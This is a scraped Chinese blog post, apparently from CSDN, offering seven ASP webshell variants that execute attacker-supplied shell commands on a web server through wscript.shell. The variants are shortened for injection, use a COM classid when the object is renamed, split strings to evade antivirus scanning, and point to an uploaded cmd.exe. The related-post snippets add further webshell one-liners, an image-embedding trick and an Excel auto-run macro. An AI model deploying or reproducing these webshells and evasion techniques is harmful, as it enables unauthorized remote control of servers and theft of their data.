关于一句话木马

最新推荐文章于 2021-04-04 20:06:39 发布
最新推荐文章于 2021-04-04 20:06:39 发布
阅读量982 收藏
点赞数
分类专栏: 网络安全-必备知识 文章标签: cmd input asp object server c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xdfwsl/article/details/708564
版权

这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>


这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:


<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成


<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>


第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:/aspx/cmD.EXE /c
"&request("c")).stdout.readall%>

xdfwsl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 简单的webshell_一句话木马的简单例子 网站webshell & 远程连接
weixin_30706851的博客
02-26 902
一 概述本地 kail linux目标 windows nt 服务器二 过程首先编写一句话木马 index.php一句话木马的原理就是把C=xxx 字符串当成php语句执行注意这里用了GET,因为尝试过POST不成功编写 上传脚本 index.pyimportrequestsbase_url='http://192.168.1.4/'url_for_time='index.php?modul...
在excel VBA中调用R语言程序的尝试 基础篇
qq_42742969的博客
01-06 1493
目录 一、 绪论. (一) 背景. (二) 使用工具. 二、 基础实行过程. (一) 中介工具的选择. (二) 实现中介工具的信息传递. (三) 函数化. (四) 小结. 提示:成品请直接看 二(三)的最后,前面的都是思路铺垫。 一,绪论 (一)背景 某日捣鼓excel的VBA编程时,突发奇想,R语言是统计领域的王者,而且开源免费。Excel 是重要的办公软件,商务数据分析的王牌工具,在工作中很重要。在R中有相应的包(package)可以操纵excel表格。.
一句话木马
魔拉宝
01-08 639
  黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:    (现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)  当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道这个文件被插入到哪一个ASP文件里面就可以了。)  这就被称为一句话木马,它是基于B/S结构的。   首先,找到数据库是asp格式的
列出文件目录结构
weixin_34121304的博客
12-14 322
2019独角兽企业重金招聘Python工程师标准>>> ...
ASP代码审计学习笔记 -4.命令执行漏洞
08-27 77
命令执行漏洞: 保存为cmd.asp,提交链接:http://localhost/cmd.asp?ip=127.0.0.1 即可执行命令 <%ip=request("ip") response.write server.createobject("wscript.shell").exec("cmd.exe /c ping "&ip&""...
一句话木马要点和防范注意事项
最新发布
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
asp一句话.zip
06-28
- `Response.Write Execute(Request("cmd"))`:这是一个典型的一句话木马,它接收GET或POST请求中的"cmd"参数,然后执行命令并返回结果。 - `Eval(Request("data"))`:这行代码会评估接收到的数据,如果数据包含...
pythonres干什么用的_Python subprocess模块功能与常见用法实例详解
weixin_40006185的博客
11-23 404
本文实例讲述了Python subprocess模块功能与常见用法。分享给大家供大家参考,具体如下:一、简介subprocess最早在2.4版本引入。用来生成子进程,并可以通过管道连接他们的输入/输出/错误,以及获得他们的返回值。subprocess用来替换多个旧模块和函数:os.systemos.spawn*os.popen*popen2.*commands.*运行python的时候,我们都是在...
golang之ioutil.ReadAll()读取标准输出的问题
ferghs的专栏
03-20 9824
问题描述 之前在使用ioutil.ReadAll()读取cmd.CombinedOutput()的标准输出时遇到程序挂起的问题,代码如下: func main() { cmd := exec.Command("git", "clone","https://github.com/test/test.git") stdout, _ := cmd.StdoutPipe() ...
Dos命令制作一句话木马
八月的专栏
11-30 2850
打开cmd,转到你的图片和一句话所在的文件夹,例如图片是1,jpg   一句话是1.php 然后你输入 copy 1.jpg/a+1.php/b 1.php 然后点回车,就生成了你自己的一句话图片木马。
webshell下执行命令脚本汇集
weixin_33743703的博客
03-17 154
cmd1.asp <object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=shell scope=page cl...
一句话木马新方法
收集盒 Book box
07-02 557
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。 使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。 不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。 这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。 首先:原程序代码是“〈%execute request(“
木马学习笔记 1【一句话木马篇】
Sp4rkW的博客
10-27 7087
注意注意:本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~ ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流中也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~ 下面从一些基本种类的一句话木马开始讲起【PHP环境】,主要讲述一句话木马绕过及不死鸟木马的原理 1.最最最最基础一句话 eval($_POST["...
webshell一句话木马大全
努力是为了让自己更加有方向
04-04 1582
转载:来自WebShell’S Blog,地址:https://www.webshell.cc/2265.html 比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request(“sb”)%> 程序代码 <%execute request(“sb”)%> 程序代码 <%execute(request(“sb”))%> 程序代码 <%execute request(“sb”)%><%’<%
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值